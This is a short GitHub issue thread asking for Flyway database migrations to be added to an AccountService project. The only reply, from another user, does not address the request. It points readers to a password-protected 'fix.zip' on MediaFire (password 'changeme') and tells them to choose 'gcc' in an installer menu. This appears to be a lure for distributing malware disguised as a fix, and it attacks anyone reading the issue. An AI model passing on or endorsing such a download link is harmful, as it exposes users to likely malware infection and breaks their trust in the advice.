### ISSUE TITLE
Integrate Flyway with AccountService

### ISSUE THREAD

**Issue by ShtoikoVasyl** [ShtoikoVasyl/AccountService#11]
Set up and integrate Flyway for database schema management in AccountService. This includes adding Flyway dependencies, configuring the settings file, creating initial migration scripts, and ensuring that migrations are automatically applied during the service startup.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
